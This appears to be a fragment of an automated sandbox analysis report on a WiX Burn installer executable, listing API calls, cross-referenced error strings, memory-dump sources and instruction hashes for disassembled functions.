                                                                                                                                                                                                                                                                            • Instruction ID: 7448189e6029a9a35544a3e443a7a7d68e69089784959029bb86331a1d1aa27f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac242df2f5990cfad055d5ec6ca9666f35e5a405fe97ea318f001c84d02c7098
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9941C772E41318B6DF219B959C4EFEFBAB8EF81714F104056FA04B62D1E2745E40DAA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00929387
                                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0092938F
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00929418
                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00929443
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00929498
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                            • Opcode ID: 86c1ec2b23fd59ee82060c53f8d71b702fe204724c0734725fe683fa93dd2bfa
                                                                                                                                                                                                                                                                            • Instruction ID: c561a84b41a5c66d878388bdabc80000b3be4877add5621912af79c9bb22d32d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86c1ec2b23fd59ee82060c53f8d71b702fe204724c0734725fe683fa93dd2bfa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F041A934E00228ABCF10EF69E884A9E7BB9FF45318F148155E8195B3AAD731E955CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,008F8EB7,?,?,?,?), ref: 0093D584
                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,?,008F8EB7,?,?,?,?), ref: 0093D609
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EnumInfoQueryValue
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate array for registry value name$Failed to enumerate registry value$Failed to get max size of value name under registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 918324718-3509199686
                                                                                                                                                                                                                                                                            • Opcode ID: 3ab625ace38145370f3beb403745fb54bc734df28ab8841c7ea49c49fb97847d
                                                                                                                                                                                                                                                                            • Instruction ID: 486351ec9e60bdf06a94e2754f78aabdfca5c2359fbbd891062338badd546519
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ab625ace38145370f3beb403745fb54bc734df28ab8841c7ea49c49fb97847d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03217DB7601218BBEB015F15AC59EBF366DEBC575CF124029BE18E7340E6748D019E70
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,008E6CF2,000000FF,04685000,000000FF,00000000,PackageVersion,008E6CF2,8D18C483,009031C1,00000001,00000000,008E6CF2,009031C1,008E6CF2), ref: 008F7794
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,PackageVersion,008E6CF2,8D18C483,009031C1,00000001,00000000,008E6CF2,009031C1,008E6CF2,00000000,009031C1,009031C1,009031C1,008E6CF2), ref: 008F77B1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F774A, 008F77F8
                                                                                                                                                                                                                                                                            • PackageVersion, xrefs: 008F7775
                                                                                                                                                                                                                                                                            • Failed to remove update registration key: %ls, xrefs: 008F77E6
                                                                                                                                                                                                                                                                            • Failed to format key for update registration., xrefs: 008F7738
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 446873843-2063007608
                                                                                                                                                                                                                                                                            • Opcode ID: e60a482bb0c9f03c8254e6dd2ed642a58f354d34bf52fc7deca2b17c46e295cf
                                                                                                                                                                                                                                                                            • Instruction ID: 6815d493d39e7f16f751b14a52b8289e944bb4d6d13e9f8bd9e889e2b29c028c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e60a482bb0c9f03c8254e6dd2ed642a58f354d34bf52fc7deca2b17c46e295cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4831F931D54229B7EB11AAB98C0AFAFBE78FF05751F100171BE10F6191E6704A40D7E1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 008E74C2
                                                                                                                                                                                                                                                                              • Part of subcall function 008E4456: SetLastError.KERNEL32(00000000,?,?,?), ref: 008E446B
                                                                                                                                                                                                                                                                              • Part of subcall function 008E4456: GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 008E447A
                                                                                                                                                                                                                                                                              • Part of subcall function 008E4456: GetLastError.KERNEL32(?,?,?), ref: 008E4484
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7416, 008E74AD
                                                                                                                                                                                                                                                                            • Failed to open run once log., xrefs: 008E7404
                                                                                                                                                                                                                                                                            • Failed to get current process path., xrefs: 008E7462
                                                                                                                                                                                                                                                                            • Unable to get resume command line from the registry, xrefs: 008E743E
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008E74C2
                                                                                                                                                                                                                                                                            • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 008E749B
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CloseFileHandleModuleName
                                                                                                                                                                                                                                                                            • String ID: Failed to get current process path.$Failed to open run once log.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry$d:\a\wix4\wix4\src\burn\engine\engine.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 628991300-3452002823
                                                                                                                                                                                                                                                                            • Opcode ID: b0f0cbb099296dabff624262a9af86d210c46597869d6e7110b7e2cc735803b6
                                                                                                                                                                                                                                                                            • Instruction ID: eff9d7dd5adc4317ebee3ef4428b8a9a4e6bc56a8f222a66678abbbd2faaaebd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0f0cbb099296dabff624262a9af86d210c46597869d6e7110b7e2cc735803b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8310672E40659B7DF22DBE68C46EDEBB68FF01709F004125FA04F6180E670AA448B91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Error reading version registry value due to unexpected data type: %u$Failed to convert registry string to version.$Failed to copy QWORD version value.$Failed to read version registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-2150151203
                                                                                                                                                                                                                                                                            • Opcode ID: 3d50a84220115ddb2646dd932e5c2e443350d27c6799adff6e17cc7612b91c1b
                                                                                                                                                                                                                                                                            • Instruction ID: ead0f519a4f2766ea243fc080451566f28b82843f02263098b91e777e217d114
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d50a84220115ddb2646dd932e5c2e443350d27c6799adff6e17cc7612b91c1b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D721F872A81354B7DF216A559C4FF9F7EBCEF96B18F004055FA14BA1C1E5B08D00DAA2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 0092408F
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcessWindow
                                                                                                                                                                                                                                                                            • String ID: BA passed NULL hwndParent to Apply.$BA passed invalid hwndParent to Apply.$Failed to alloc BOOTSTRAPPER_ENGINE_ACTION$Failed to enqueue apply action.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 850432942-3904185537
                                                                                                                                                                                                                                                                            • Opcode ID: 9e5bc1954e14a4192d78648dd8a57b6e87fc3300f08d05bbf61465b88d5b31d4
                                                                                                                                                                                                                                                                            • Instruction ID: b2861475ced8418d7dd072762deeddb5f6857dda04d0e511d6b8b637e25565df
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e5bc1954e14a4192d78648dd8a57b6e87fc3300f08d05bbf61465b88d5b31d4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E52126B1B80324BBE7219A55AC4FF6F255CDB62F58F110115B700BF1C2E6E69E508AE3
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for message.$Failed to calculate total pipe message size$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-2608942841
                                                                                                                                                                                                                                                                            • Opcode ID: 10eb360022f30a9b103d884ee1689153e7f6c0ad205f975e1398031987ee8eef
                                                                                                                                                                                                                                                                            • Instruction ID: bd0e540691d1f684743ad15d48dffbf9ee93225a8f77fa806d3a1882b457c9ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10eb360022f30a9b103d884ee1689153e7f6c0ad205f975e1398031987ee8eef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F21B5B2500248BBDB11EA9ACC85FEFBBACEF96724F100115F604EB241D674990487A2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,00000000,00000000), ref: 008FD523
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FD52D
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,00000000,00000000), ref: 008FD599
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 669721577-2625618253
                                                                                                                                                                                                                                                                            • Opcode ID: e18ad0bf191193898ec8c35e7820c94ba072eed6d74015d57edbcbae6e918058
                                                                                                                                                                                                                                                                            • Instruction ID: 478534ff8288faa391f9ff62bfabaf688655296cca5e176653958e64bb674dc8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e18ad0bf191193898ec8c35e7820c94ba072eed6d74015d57edbcbae6e918058
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC210D72E4031877E7219AA98C8AF6FB66DFF45B54F114115BB04FB1C1E2B09D008BA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094BB55
                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 0094BB94
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094BB9E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastTime$FileSystem
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\inetutil.cpp$failed to convert system time to file time$failed to get create time for internet file handle
                                                                                                                                                                                                                                                                            • API String ID: 1528435940-425296829
                                                                                                                                                                                                                                                                            • Opcode ID: 2b88b5212238dd7d9cc5d50a961950c2c9637430d2e03e5e86e827066a9cfe9b
                                                                                                                                                                                                                                                                            • Instruction ID: d4ffa461d20ed40d3334a050b7babe21ba860174613e5be983079540238a4343
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b88b5212238dd7d9cc5d50a961950c2c9637430d2e03e5e86e827066a9cfe9b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C213A73A40229B7E720DAA49C09FBFB6ACEF45B50F010125FE04FB180E674DC0086E1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1970631241-1065166858
                                                                                                                                                                                                                                                                            • Opcode ID: 7b54b05e93bc67f4a6fdf38d087bb5f69da4ad48da8307e40de98c3a13db1fb3
                                                                                                                                                                                                                                                                            • Instruction ID: 412e73189ef2e677147e79dd9205da37f3f000cf0eb3ec4a7b8929142eedb777
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b54b05e93bc67f4a6fdf38d087bb5f69da4ad48da8307e40de98c3a13db1fb3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63210076640201AFCB01DF5DCC89E9A7BACEF85B54F110454FA24EB2D6E2B0D900DB20
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,0093B4C2,?), ref: 0093B5EF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • EnableLUA, xrefs: 0093B599
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp, xrefs: 0093B582
                                                                                                                                                                                                                                                                            • Failed to read registry value to detect UAC., xrefs: 0093B5C7
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0093B539
                                                                                                                                                                                                                                                                            • Failed to open system policy key to detect UAC., xrefs: 0093B573
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: EnableLUA$Failed to open system policy key to detect UAC.$Failed to read registry value to detect UAC.$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-1917839530
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0090D303,00000000,00000008,00000000,80070656), ref: 008E2B56
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0090D303,00000000,00000008,00000000,80070656,?,?,008FA7BB,00000001,00000000,80070656,00000000,?), ref: 008E2B63
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0090D303,00000000,00000008,00000000,80070656,?,?,008FA7BB,00000001), ref: 008E2BE7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate string for message.$Failed to format message for error: 0x%x$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\strutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1365068426-3351270200
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(008E7D9B), ref: 00940C6C
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00940CB6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectNodes$pixnParent parameter was null in XmlSelectNodes$ppixnChild parameter was null in XmlSelectNodes
                                                                                                                                                                                                                                                                            • API String ID: 344208780-3683195698
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(008E7D9B), ref: 00940D43
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00940D8D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectSingleNode$pixnParent parameter was null in XmlSelectSingleNode$ppixnChild parameter was null in XmlSelectSingleNode
                                                                                                                                                                                                                                                                            • API String ID: 344208780-1462723567
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00932CD2,?,?,00000000,?,?,?,00932E2C,00000022,FlsSetValue,0096DA4C,0096DA54,?), ref: 00932C84
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 008ED825
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Condition, xrefs: 008ED790
                                                                                                                                                                                                                                                                            • Failed to copy condition string from BSTR, xrefs: 008ED7FE
                                                                                                                                                                                                                                                                            • Failed to select condition node., xrefs: 008ED7B2
                                                                                                                                                                                                                                                                            • Failed to get Condition inner text., xrefs: 008ED7D8
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\condition.cpp, xrefs: 008ED810
                                                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$d:\a\wix4\wix4\src\burn\engine\condition.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-1135705897
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00948C80
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Already process this datetime value.$Failed to convert value to time.$Failed to get value.$clbcatq.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-436059191
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • PathAllocCanonicalize.KERNELBASE(?,?,00941D45), ref: 00941C32
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,?,00941D45,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00941C9F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to initialize path2utl., xrefs: 00941C79
                                                                                                                                                                                                                                                                            • Failed to canonicalize: %ls, xrefs: 00941C3D
                                                                                                                                                                                                                                                                            • Failed to copy the canonicalized path., xrefs: 00941C6B
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 00941C49, 00941C85
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocCanonicalizeFreeLocalPath
                                                                                                                                                                                                                                                                            • String ID: Failed to canonicalize: %ls$Failed to copy the canonicalized path.$Failed to initialize path2utl.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2828741713-2733107982
                                                                                                                                                                                                                                                                            APIs
